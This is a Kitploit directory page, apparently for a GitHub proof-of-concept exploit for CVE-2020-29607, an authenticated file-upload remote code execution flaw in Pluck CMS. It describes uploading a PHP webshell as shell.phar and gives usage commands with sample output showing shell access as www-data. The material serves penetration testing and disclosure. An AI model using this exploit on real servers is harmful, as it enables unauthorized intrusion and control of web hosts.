Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC — Authenticated remote code execution in Pluck CMS before 4.7.13. | Kitploit
도구/GitHubGitHub/estebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubestebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc

CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC

Authenticated remote code execution in Pluck CMS before 4.7.13.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
15개월 전아직 검토되지 않음

CVE-2020-29607 — Pluck CMS <= 4.7.13 인증된 파일 업로드 RCE (PoC)

Pluck CMS 4.7.13 이전 버전에서 인증된 원격 코드 실행 취약점입니다. 관리자 파일 관리자(admin.php?action=files)는 파일 확장자를 검증하지 않아 .phar 파일 업로드를 허용하며, Apache는 이를 PHP로 실행합니다. 이 엔드포인트를 통해 웹쉘을 업로드하면 웹 서버 사용자 권한으로 RCE가 발생합니다.


작동 방식

  1. 제공된 관리자 비밀번호를 사용하여 인증합니다.
  2. 관리자 파일 관리자를 통해 shell.phar로 PHP 웹쉘을 업로드합니다.
  3. 웹쉘을 요청하고 id를 실행하여 실행을 확인합니다.
  4. 업로드된 웹쉘에 대해 대화형 명령 루프를 엽니다.

요구 사항

  • Python 3
  • 종속성 설치:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

사용법

root@kitploit:~
# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD

# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck

예시:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

참고 자료

  • CVE-2020-29607
  • EDB-49909
  • Ron Jost(Hacker5preme)의 원본 PoC

크레딧

  • 발견 및 원본 익스플로잇: Ron Jost (Hacker5preme)
  • Python 3 포팅 및 대화형 셸: Esteban Zárate
도구 다운로드